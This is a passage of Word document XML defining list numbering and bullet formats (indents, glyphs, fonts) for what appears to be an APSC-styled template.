      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="643"/>
        </w:tabs>
        <w:ind w:left="643" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:nsid w:val="FFFFFF80"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DA3CE1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4E328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5A8C85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D80B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EA42B42"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9">
    <w:nsid w:val="FFFFFF89"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F6F0E2F4"/>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multilevel"/>
    <w:tmpl w:val="894EE874"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="ImportWordListStyleDefinition-119"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode MS" w:hAnsi="Helvetica" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:outline w:val="0"/>
        <w:color w:val="000000"/>
        <w:kern w:val="0"/>
        <w:position w:val="0"/>
        <w:sz w:val="22"/>
        <w:u w:val="none" w:color="000000"/>
        <w:vertAlign w:val="baseline"/>
        <w:rtl w:val="0"/>
        <w:em w:val="none"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode MS" w:hAnsi="Helvetica" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:outline w:val="0"/>
        <w:color w:val="000000"/>
        <w:kern w:val="0"/>
        <w:position w:val="0"/>
        <w:sz w:val="22"/>
        <w:u w:val="none" w:color="000000"/>
        <w:vertAlign w:val="baseline"/>
        <w:rtl w:val="0"/>
        <w:em w:val="none"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode MS" w:hAnsi="Helvetica" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:outline w:val="0"/>
        <w:color w:val="000000"/>
        <w:kern w:val="0"/>
        <w:position w:val="0"/>
        <w:sz w:val="22"/>
        <w:u w:val="none" w:color="000000"/>
        <w:vertAlign w:val="baseline"/>
        <w:rtl w:val="0"/>
        <w:em w:val="none"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode MS" w:hAnsi="Helvetica" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:outline w:val="0"/>
        <w:color w:val="000000"/>
        <w:kern w:val="0"/>
        <w:position w:val="0"/>
        <w:sz w:val="22"/>
        <w:u w:val="none" w:color="000000"/>
        <w:vertAlign w:val="baseline"/>
        <w:rtl w:val="0"/>
        <w:em w:val="none"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode MS" w:hAnsi="Helvetica" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:outline w:val="0"/>
        <w:color w:val="000000"/>
        <w:kern w:val="0"/>
        <w:position w:val="0"/>
        <w:sz w:val="22"/>
        <w:u w:val="none" w:color="000000"/>
        <w:vertAlign w:val="baseline"/>
        <w:rtl w:val="0"/>
        <w:em w:val="none"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode MS" w:hAnsi="Helvetica" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:outline w:val="0"/>
        <w:color w:val="000000"/>
        <w:kern w:val="0"/>
        <w:position w:val="0"/>
        <w:sz w:val="22"/>
        <w:u w:val="none" w:color="000000"/>
        <w:vertAlign w:val="baseline"/>
        <w:rtl w:val="0"/>
        <w:em w:val="none"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode MS" w:hAnsi="Helvetica" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:outline w:val="0"/>
        <w:color w:val="000000"/>
        <w:kern w:val="0"/>
        <w:position w:val="0"/>
        <w:sz w:val="22"/>
        <w:u w:val="none" w:color="000000"/>
        <w:vertAlign w:val="baseline"/>
        <w:rtl w:val="0"/>
        <w:em w:val="none"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode MS" w:hAnsi="Helvetica" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:outline w:val="0"/>
        <w:color w:val="000000"/>
        <w:kern w:val="0"/>
        <w:position w:val="0"/>
        <w:sz w:val="22"/>
        <w:u w:val="none" w:color="000000"/>
        <w:vertAlign w:val="baseline"/>
        <w:rtl w:val="0"/>
        <w:em w:val="none"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode MS" w:hAnsi="Helvetica" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:outline w:val="0"/>
        <w:color w:val="000000"/>
        <w:kern w:val="0"/>
        <w:position w:val="0"/>
        <w:sz w:val="22"/>
        <w:u w:val="none" w:color="000000"/>
        <w:vertAlign w:val="baseline"/>
        <w:rtl w:val="0"/>
        <w:em w:val="none"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11">
    <w:nsid w:val="03411098"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7F56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787456"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC6045EE"/>
    <w:styleLink w:val="APSCNumberedtext"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="340" w:hanging="340"/>
      </w:pPr>
      <w:rPr>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="680" w:hanging="340"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="680" w:hanging="340"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1021" w:hanging="341"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1361" w:hanging="340"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1701" w:hanging="340"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:sz w:val="22"/>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3">
    <w:nsid w:val="0A355692"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B99E82CC"/>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bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="680" w:hanging="226"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="907" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1134" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1361" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1588" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1814" w:hanging="226"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2041" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14">
    <w:nsid w:val="0FE56BF6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5AC87F2"/>
    <w:lvl w:ilvl="0" w:tplc="D130BD7E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="APSCBoxedbullet2"/>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
    <w:nsid w:val="12FF6F80"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11401AAA"/>
    <w:styleLink w:val="Style1"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1494" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1881" w:hanging="180"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:sz w:val="22"/>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3874A6A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40C8CD94"/>
    <w:lvl w:ilvl="0" w:tplc="325692BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="APSCBullet-Level1"/>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nsid w:val="15FB6245"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B25E60CC"/>
    <w:lvl w:ilvl="0" w:tplc="D5746A16">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="APSCBullet-Level3"/>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6544AF5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B54E200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1EAB4777"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1F47618"/>
    <w:lvl w:ilvl="0" w:tplc="07C0D5AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="APSCBullet-Level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EEF7247"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B99E82CC"/>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bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="680" w:hanging="226"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="907" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1134" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1361" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1588" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1814" w:hanging="226"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2041" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21">
    <w:nsid w:val="298D2FC3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07664B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B2021E6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B99E82CC"/>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bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="680" w:hanging="226"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="907" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1134" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1361" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1588" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1814" w:hanging="226"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2041" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23">
    <w:nsid w:val="2BB335D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B99E82CC"/>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bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="680" w:hanging="226"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="907" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1134" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1361" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1588" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1814" w:hanging="226"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2041" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="24">
    <w:nsid w:val="2CA26BAD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="276CA6B6"/>
    <w:lvl w:ilvl="0" w:tplc="3FDEBB02">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="APSCBullet-Level4"/>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2D0E3A20"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E2E4DE34"/>
